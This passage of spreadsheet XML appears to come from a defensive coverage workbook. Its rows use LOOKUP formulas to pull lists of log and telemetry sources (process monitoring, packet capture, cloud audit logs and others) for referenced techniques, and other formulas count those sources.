        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C36" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D36" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E36" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F36" s="53"/>
      <c r="G36" s="19"/>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A37" s="16" t="s">
        <v>102</v>
      </c>
      <c r="B37" s="53" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C37" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D37" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E37" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F37" s="53"/>
      <c r="G37" s="19"/>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A38" s="16" t="s">
        <v>103</v>
      </c>
      <c r="B38" s="53" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C38" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D38" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E38" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F38" s="53"/>
      <c r="G38" s="19"/>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A39" s="16" t="s">
        <v>105</v>
      </c>
      <c r="B39" s="53" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C39" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D39" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E39" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F39" s="53"/>
      <c r="G39" s="19"/>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A40" s="16" t="s">
        <v>106</v>
      </c>
      <c r="B40" s="53" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C40" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D40" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E40" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F40" s="53"/>
      <c r="G40" s="19"/>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A41" s="16" t="s">
        <v>108</v>
      </c>
      <c r="B41" s="53" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C41" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D41" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E41" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F41" s="53"/>
      <c r="G41" s="19"/>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A42" s="16" t="s">
        <v>110</v>
      </c>
      <c r="B42" s="53" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C42" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D42" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E42" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F42" s="53"/>
      <c r="G42" s="19"/>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A43" s="16" t="s">
        <v>112</v>
      </c>
      <c r="B43" s="53" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C43" s="17" t="s">
        <v>50</v>
      </c>
      <c r="D43" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E43" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F43" s="53"/>
      <c r="G43" s="19"/>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A44" s="16" t="s">
        <v>113</v>
      </c>
      <c r="B44" s="53" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C44" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D44" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E44" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F44" s="53"/>
      <c r="G44" s="19"/>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A45" s="16" t="s">
        <v>115</v>
      </c>
      <c r="B45" s="53" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C45" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D45" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E45" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F45" s="53"/>
      <c r="G45" s="19"/>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A46" s="16" t="s">
        <v>116</v>
      </c>
      <c r="B46" s="53" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C46" s="17">
        <v>100</v>
      </c>
      <c r="D46" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E46" s="53">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F46" s="53"/>
      <c r="G46" s="19"/>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A47" s="16" t="s">
        <v>117</v>
      </c>
      <c r="B47" s="53" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C47" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D47" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E47" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F47" s="53"/>
      <c r="G47" s="19"/>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A48" s="16" t="s">
        <v>118</v>
      </c>
      <c r="B48" s="53" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C48" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D48" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E48" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F48" s="53"/>
      <c r="G48" s="19"/>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A49" s="16" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="53" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
      <c r="C49" s="17" t="s">
        <v>120</v>
      </c>
      <c r="D49" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E49" s="53">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F49" s="53"/>
      <c r="G49" s="19"/>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A50" s="16" t="s">
        <v>121</v>
      </c>
      <c r="B50" s="53" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C50" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D50" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E50" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F50" s="53"/>
      <c r="G50" s="19"/>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A51" s="16" t="s">
        <v>123</v>
      </c>
      <c r="B51" s="53" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C51" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D51" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E51" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F51" s="53"/>
      <c r="G51" s="19"/>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A52" s="16" t="s">
        <v>124</v>
      </c>
      <c r="B52" s="53" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C52" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D52" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E52" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F52" s="53"/>
      <c r="G52" s="19"/>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A53" s="16" t="s">
        <v>125</v>
      </c>
      <c r="B53" s="53" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Data loss prevention,File monitoring</v>
      </c>
      <c r="C53" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D53" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E53" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F53" s="53"/>
      <c r="G53" s="19"/>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A54" s="16" t="s">
        <v>127</v>
      </c>
      <c r="B54" s="53" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C54" s="17" t="s">
        <v>128</v>
      </c>
      <c r="D54" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E54" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F54" s="53"/>
      <c r="G54" s="19"/>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A55" s="16" t="s">
        <v>129</v>
      </c>
      <c r="B55" s="53" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C55" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D55" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E55" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F55" s="53"/>
      <c r="G55" s="19"/>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A56" s="16" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="53" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
      <c r="C56" s="17" t="s">
        <v>132</v>
      </c>
      <c r="D56" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E56" s="53">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F56" s="53"/>
      <c r="G56" s="19"/>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A57" s="16" t="s">
        <v>133</v>
      </c>
      <c r="B57" s="53" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,User interface,Process command-line parameters,Process monitoring,PowerShell logs,Loaded DLLs,Kernel drivers,DLL monitoring,Binary file metadata,API monitoring</v>
      </c>
      <c r="C57" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D57" s="53">
        <f t="shared" si="1"/>
        <v>11</v>
      </c>
      <c r="E57" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F57" s="53"/>
      <c r="G57" s="19"/>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A58" s="16" t="s">
        <v>135</v>
      </c>
      <c r="B58" s="53" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C58" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D58" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E58" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F58" s="53"/>
      <c r="G58" s="19"/>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A59" s="16" t="s">
        <v>136</v>
      </c>
      <c r="B59" s="53" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C59" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D59" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E59" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F59" s="53"/>
      <c r="G59" s="19"/>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A60" s="16" t="s">
        <v>138</v>
      </c>
      <c r="B60" s="53" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,PowerShell logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C60" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D60" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E60" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F60" s="53"/>
      <c r="G60" s="19"/>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A61" s="16" t="s">
        <v>139</v>
      </c>
      <c r="B61" s="53" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network device run-time memory,Network device command history,Network device configuration</v>
      </c>
      <c r="C61" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D61" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E61" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F61" s="53"/>
      <c r="G61" s="19"/>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A62" s="16" t="s">
        <v>141</v>
      </c>
      <c r="B62" s="53" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C62" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D62" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E62" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F62" s="53"/>
      <c r="G62" s="19"/>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A63" s="16" t="s">
        <v>142</v>
      </c>
      <c r="B63" s="53" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C63" s="17">
        <v>100</v>
      </c>
      <c r="D63" s="53">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E63" s="53">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F63" s="53"/>
      <c r="G63" s="19"/>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A64" s="16" t="s">
        <v>143</v>
      </c>
      <c r="B64" s="53" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C64" s="17" t="s">
        <v>144</v>
      </c>
      <c r="D64" s="53">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E64" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F64" s="53"/>
      <c r="G64" s="19"/>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A65" s="16" t="s">
        <v>145</v>
      </c>
      <c r="B65" s="53" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C65" s="17" t="s">
        <v>146</v>
      </c>
      <c r="D65" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E65" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F65" s="53"/>
      <c r="G65" s="19"/>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A66" s="16" t="s">
        <v>147</v>
      </c>
      <c r="B66" s="53" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C66" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D66" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E66" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F66" s="53"/>
      <c r="G66" s="19"/>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A67" s="16" t="s">
        <v>148</v>
      </c>
      <c r="B67" s="53" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C67" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D67" s="53">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E67" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F67" s="53"/>
      <c r="G67" s="19"/>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A68" s="16" t="s">
        <v>149</v>
      </c>
      <c r="B68" s="53" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C68" s="17" t="s">
        <v>150</v>
      </c>
      <c r="D68" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E68" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F68" s="53"/>
      <c r="G68" s="19"/>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A69" s="16" t="s">
        <v>151</v>
      </c>
      <c r="B69" s="53" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
      <c r="C69" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D69" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E69" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F69" s="53"/>
      <c r="G69" s="19"/>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A70" s="16" t="s">
        <v>153</v>
      </c>
      <c r="B70" s="53" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,AWS CloudTrail logs,Azure activity logs,Office 365 account logs,API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C70" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D70" s="53">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
      <c r="E70" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F70" s="53"/>
      <c r="G70" s="19"/>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A71" s="16" t="s">
        <v>154</v>
      </c>
      <c r="B71" s="53" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
      <c r="C71" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D71" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E71" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F71" s="53"/>
      <c r="G71" s="19"/>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A72" s="16" t="s">
        <v>155</v>
      </c>
      <c r="B72" s="53" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>DNS records,Network protocol analysis,Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C72" s="17" t="s">
        <v>156</v>
      </c>
      <c r="D72" s="53">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E72" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F72" s="53"/>
      <c r="G72" s="19"/>
    </row>
    <row r="73" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A73" s="16" t="s">
        <v>157</v>
      </c>
      <c r="B73" s="53" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C73" s="17" t="s">
        <v>158</v>
      </c>
      <c r="D73" s="53">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E73" s="53">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F73" s="53"/>
      <c r="G73" s="19"/>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A74" s="16" t="s">
        <v>159</v>
      </c>
      <c r="B74" s="53" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,File monitoring,Third-party application logs,Windows Registry,Process monitoring,Process use of network,Binary file metadata</v>
      </c>
      <c r="C74" s="17" t="s">
        <v>137</v>
      </c>
      <c r="D74" s="53">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
      <c r="E74" s="53">
        <f t="shared" ref="E74:E137" si="4">LEN(TRIM(C74))-LEN(SUBSTITUTE(TRIM(C74),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F74" s="53"/>
      <c r="G74" s="19"/>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A75" s="16" t="s">
        <v>160</v>
      </c>
      <c r="B75" s="53" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C75" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D75" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E75" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F75" s="53"/>
      <c r="G75" s="19"/>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A76" s="16" t="s">
        <v>161</v>
      </c>
      <c r="B76" s="53" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C76" s="17">
        <v>100</v>
      </c>
      <c r="D76" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E76" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F76" s="53"/>
      <c r="G76" s="19"/>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A77" s="16" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="53" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C77" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D77" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E77" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F77" s="53"/>
      <c r="G77" s="19"/>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A78" s="16" t="s">
        <v>163</v>
      </c>
      <c r="B78" s="53" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C78" s="17" t="s">
        <v>164</v>
      </c>
      <c r="D78" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E78" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F78" s="53"/>
      <c r="G78" s="19"/>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A79" s="16" t="s">
        <v>165</v>
      </c>
      <c r="B79" s="53" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:C)</f>
        <v>AWS CloudTrail logs,Stackdriver logs,Authentication logs,Process monitoring</v>
      </c>
      <c r="C79" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D79" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E79" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F79" s="53"/>
      <c r="G79" s="19"/>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A80" s="16" t="s">
        <v>167</v>
      </c>
      <c r="B80" s="53" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Authentication logs,AWS CloudTrail logs,Stackdriver logs</v>
      </c>
      <c r="C80" s="17" t="s">
        <v>168</v>
      </c>
      <c r="D80" s="53">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="E80" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F80" s="53"/>
      <c r="G80" s="19"/>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A81" s="16" t="s">
        <v>169</v>
      </c>
      <c r="B81" s="53" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C81" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D81" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E81" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F81" s="53"/>
      <c r="G81" s="19"/>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A82" s="16" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="53" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C82" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D82" s="53">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="E82" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F82" s="53"/>
      <c r="G82" s="19"/>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A83" s="16" t="s">
        <v>171</v>
      </c>
      <c r="B83" s="53" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C83" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D83" s="53">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E83" s="53">
        <f t="shared" si="4"/>
        <v>2</v>
      </c>
      <c r="F83" s="53"/>
      <c r="G83" s="19"/>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A84" s="16" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="53" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C84" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D84" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E84" s="53">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="F84" s="53"/>
      <c r="G84" s="19"/>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A85" s="16" t="s">
        <v>173</v>
      </c>
      <c r="B85" s="53" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C85" s="17">
        <v>100</v>
      </c>
      <c r="D85" s="53">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E85" s="53">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="F85" s="53"/>
      <c r="G85" s="19"/>
    </row>
